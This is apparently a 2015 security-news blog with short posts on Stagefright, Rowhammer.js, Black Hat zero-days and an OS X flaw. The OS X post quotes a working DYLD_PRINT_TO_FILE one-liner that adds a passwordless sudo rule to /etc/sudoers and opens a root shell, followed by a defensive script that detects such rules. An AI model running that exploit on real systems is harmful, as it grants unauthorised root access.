Jul 15 28

Full disclosure at BlackHat 2015!

‘Stagefright’ gets the title of ‘Mother of all Android Vulnerabilities’, as it impacts 95% of all Android devices out there and does not require any interaction with the victim.

The cause of the problem appears to be a memory error in the processing of MPEG4 and 3GPP video files.

written by d45id

Jul 15 25

In this paper we [Daniel Gruss, Clémentine Maurice, Stefan Mangard] present Rowhammer.js, a JavaScript-based implementation of the Rowhammer attack. Our attack uses an eviction strategy found by a generic algorithm that improves the eviction rate compared to existing eviction strategies from 95.2% to 99.99%. Rowhammer.js is the first remote software-induced hardware-fault attack. In contrast to other fault attacks it does not require physical access to the machine, or the execution of native code or access to special instructions. As JavaScript-based fault attacks can be performed on millions of users stealthily and simultaneously, we propose countermeasures that can be implemented immediately.

written by d45id

Jul 15 23

Security expert Stefan Esser discovered a privilege escalation vulnerability in OS X 10.10. The vulnerability is found in the dynamic linker dyld.

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

The OS X 10.11 pre-release candidate is not vulnerable. For everyone who wants to fix the problem as soon as possible, Esser has published a patch.
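A defensive check for the effect of the one-liner above, as an added example that is not part of the original post or of Esser's patch: the line it writes to /etc/sudoers is a NOPASSWD:ALL rule, so this shell function lists such rules in a sudoers file. The function name audit_sudoers and the sample file content are constructed for illustration.

```shell
#!/bin/sh
# Added example: list sudoers rules that grant passwordless, unrestricted
# commands, i.e. entries shaped like "<user> ALL=(ALL) NOPASSWD:ALL".

# audit_sudoers FILE...
# Prints "file:line:principal" for each matching rule.
# Returns 0 if at least one rule was found, 1 otherwise.
# Files pulled in through #include / #includedir are not followed;
# pass them as extra arguments.
audit_sudoers() {
    awk '
        FNR == 1 { pending = "" }
        {
            line = pending $0
            # sudoers joins a line ending in a backslash with the next one
            if (line ~ /\\$/) { sub(/\\$/, " ", line); pending = line; next }
            pending = ""
            # drop comments, but keep "#<digits>" (numeric uid syntax)
            sub(/[ \t]*#[^0-9].*$/, "", line)
            sub(/^[ \t]+/, "", line)
            if (line == "" || line ~ /^Defaults/) next
            # NOPASSWD tag applied directly to the ALL command keyword
            if (line ~ /=.*NOPASSWD:[ \t]*ALL([ \t,]|$)/) {
                split(line, field, /[ \t]+/)
                printf "%s:%d:%s\n", FILENAME, FNR, field[1]
                found = 1
            }
        }
        END { exit(found ? 0 : 1) }
    ' "$@"
}

# Constructed sample: an ordinary sudoers file with one appended rule.
sample=$(mktemp)
cat > "$sample" <<'EOF'
# constructed sample, not a real system file
Defaults env_reset
root ALL=(ALL) ALL
%admin ALL=(ALL) ALL
backup ALL=(root) NOPASSWD: /usr/bin/rsync
# olduser ALL=(ALL) NOPASSWD:ALL
alice ALL=(ALL) NOPASSWD:ALL
EOF
audit_sudoers "$sample" || echo "no blanket NOPASSWD rules found"
rm -f "$sample"
```

On a real system, pass /etc/sudoers and the files under /etc/sudoers.d as arguments and compare the reported principals against the accounts that are supposed to have such a rule.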

written by d45id

Jul 15 21

…a very interesting article published in Wired magazine about wireless carjacking.

written by d45id

Jul 15 18

More than 30 zero-day flaws will be presented at the Black Hat USA 2015 security conference.

“We have 32 different zero-day vulnerabilities that will be disclosed at the event,” Wylie said. “The zero-days come from a broad swath of topics, including mobile and SCADA [supervisory control and data acquisition] systems.”

I am very curious already.

written by d45id

Jul 15 10

I’ve seen a very interesting LEGO construction at Hannover IdeenExpo: a nearly fully automated paper cube production machine.

written by d45id